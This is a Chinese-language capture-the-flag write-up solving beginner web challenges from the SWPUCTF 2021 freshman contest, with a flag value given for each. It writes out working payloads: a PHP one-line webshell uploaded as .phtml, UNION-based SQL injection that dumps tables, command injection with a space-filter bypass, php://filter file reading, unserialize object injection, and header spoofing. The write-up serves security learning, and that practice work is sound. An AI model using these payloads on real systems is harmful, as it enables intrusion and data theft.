> 文章列表 > [SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①

[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①

[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①

[SWPUCTF] 2021 新生赛(NSSCTF刷题记录wp)

    • [SWPUCTF 2021 新生赛]gift_F12
    • [第五空间 2021]签到题
    • [SWPUCTF 2021 新生赛]jicao
    • [SWPUCTF 2021 新生赛]easy_md5
    • [SWPUCTF 2021 新生赛]caidao
    • [SWPUCTF 2021 新生赛]include
    • [SWPUCTF 2021 新生赛]easyrce
    • [SWPUCTF 2021 新生赛]easy_sql
    • [第五空间 2021]WebFTP
    • [SWPUCTF 2021 新生赛]babyrce
    • [陇剑杯 2021]签到
    • [SWPUCTF 2021 新生赛]Do_you_know_http
    • [SWPUCTF 2021 新生赛]ez_unserialize
    • [SWPUCTF 2021 新生赛]easyupload1.0
    • [SWPUCTF 2021 新生赛]easyupload2.0

NSSCTF平台:https://www.nssctf.cn/

[SWPUCTF 2021 新生赛]gift_F12

直接查看源代码F12flag即可。
[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①

NSSCTF{We1c0me_t0_WLLMCTF_Th1s_1s_th3_G1ft}

[第五空间 2021]签到题

NSSCTF{welcometo5space}

[SWPUCTF 2021 新生赛]jicao

<?php
highlight_file('index.php');
include("flag.php");
$id=$_POST['id'];
$json=json_decode($_GET['json'],true);
if ($id=="wllmNB"&&$json['x']=="wllm")
{echo $flag;}
?>

所以为满足if条件,输出flag,构造Payload:

get:json={"x":"wllm"}
post:id=wllmNB   

[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①

NSSCTF{037de6d6-3b9e-4bb9-903f-4236c239b42a}

[SWPUCTF 2021 新生赛]easy_md5

<?php highlight_file(__FILE__);include 'flag2.php';if (isset($_GET['name']) && isset($_POST['password'])){$name = $_GET['name'];$password = $_POST['password'];if ($name != $password && md5($name) == md5($password)){echo $flag;}else {echo "wrong!";}}
else {echo 'wrong!';
}
?>

这里就是md5碰撞了 这里要求ab输入值不相同,md5加密后的值弱类型相等,就想到了0e的科学计数法

这里需要让password != name 又需要让他们的md5值相等,所以我们需要md5绕过 这里可以用bphackbar

QNKCDZO,s878926199a

[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①
[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①

NSSCTF{bc1ccfc9-194c-4f11-809a-3a39293691fc}

[SWPUCTF 2021 新生赛]caidao

直接告诉了密码 蚁剑直接连 flag在根目录下面。
[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①
[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①

NSSCTF{6bb489d4-e364-4302-ad0a-35cb90ee4534}

[SWPUCTF 2021 新生赛]include

[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①

Payload:?file=php://filter/convert.base64-encode/resource=flag.php

[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①
[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①

NSSCTF{4b858152-b482-4984-a358-ad8dc781923e}

[SWPUCTF 2021 新生赛]easyrce

[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①

?url=system("ls /");  #发现了 flllllaaaaaaggggggg 

[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①
[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①

NSSCTF{4ddfeb4b-a30e-42a9-8bf4-f8a480a8b083}

[SWPUCTF 2021 新生赛]easy_sql

[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①
这里告诉我们了传入的参数是wllm 发现有报错,说明存在注入点 存在字符型注入 用order by 查询字段数,查得字段数为3输入4就报错

[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①
[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①
[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①

?wllm=-1' union select 1,2,3 --+  ##-1  一个负数不存在的id值来触发报错

[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①

-1' union select 1,2,database(); --+  ##爆破数据库

[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①

-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema ='test_db'--+  #爆破表

[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①
这里有两个表test_tbuserstables的字段替换成column字段先看test_tb

wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name ='test_tb'--+

[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①

-1' union select 1,2,group_concat(id,flag) from test_tb --+ #查询

[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①

NSSCTF{94713769-163e-4e8d-a310-98e17dd7bd37}

[第五空间 2021]WebFTP

使用御剑扫描后台访问phpinfo.php 搜索FLAG即可。

[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①

[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①

NSSCTF{5d64eb71-b973-4708-a275-8f0cf576990b}

[SWPUCTF 2021 新生赛]babyrce

 <?php
error_reporting(0);
header("Content-Type:text/html;charset=utf-8");
highlight_file(__FILE__);
if($_COOKIE['admin']==1) 
{include "../next.php";
}
elseecho "小饼干最好吃啦!";
?> 小饼干最好吃啦!

bp抓包改cookieadmin=1 出现了rasalghul.php进行访问 然后又是代码审计

[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①

 <?php
error_reporting(0);
highlight_file(__FILE__);
error_reporting(0);
if (isset($_GET['url'])) {$ip=$_GET['url'];if(preg_match("/ /", $ip)){die('nonono');}$a = shell_exec($ip);echo $a;
}
?> 

这里是烧过空格 ?url=cat${IFS}/f*
[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①

NSSCTF{4f2323c6-1c66-49d4-98c0-65f184730a7b}

[陇剑杯 2021]签到

此时正在进行的可能是__________协议的网络攻击。(如有字母请全部使用小写,填写样例:http、dns、ftp)。得到的flag请使用NSSCTF{}格式提交。

NSSCTF{http}

[SWPUCTF 2021 新生赛]Do_you_know_http

[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①
直接抓包然后修改User-Agent:WLLM和本地访问X-Forwarded-For:127.0.0.1 访问/secretttt.php即可得到flag

[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①
[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①

NSSCTF{1c22fbcd-0661-40d6-921c-01b09b3257a6}

[SWPUCTF 2021 新生赛]ez_unserialize

[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①
[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①
[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①

 <?phperror_reporting(0);
show_source("cl45s.php");class wllm{public $admin;public $passwd;public function __construct(){$this->admin ="user";$this->passwd = "123456";}public function __destruct(){if($this->admin === "admin" && $this->passwd === "ctf"){include("flag.php");echo $flag;}else{echo $this->admin;echo $this->passwd;echo "Just a bit more!";}}
}$p = $_GET['p'];
unserialize($p);?> 

这里的考点就是反序列 可以参考大佬文章:https://blog.csdn.net/solitudi/article/details/113588692

Payload:?p=O:4:"wllm":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";}

[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①

NSSCTF{1387617d-68fc-4c72-aef2-f6bbafc59ed3}

[SWPUCTF 2021 新生赛]easyupload1.0

[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①
新建一个一句话木马<?php @eval($_POST['shell']);?>格式改为php然后抓包 使用phtml 然后使用WebSell工具连接 发现连接成功!!!

[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①
[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①
然后这个FLAG是假的怎么提交都不对 发现.git提示 尝试写个phpinfo(); 🆗得到FLAG

[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①
[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①
[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①

NSSCTF{7022989b-6f80-433c-b625-0e3ab22c0803}

[SWPUCTF 2021 新生赛]easyupload2.0

[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①
[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①

[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①

NSSCTF{41784aaa-7609-4a3e-8c92-7d5ea8efb3a9}

[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①

🆗感谢大家观看 这篇就先到这里了,都是些比较入门的题目,希望对刚入门CTF想刷题的小伙伴有帮助感谢大家的支持!

PDF转换器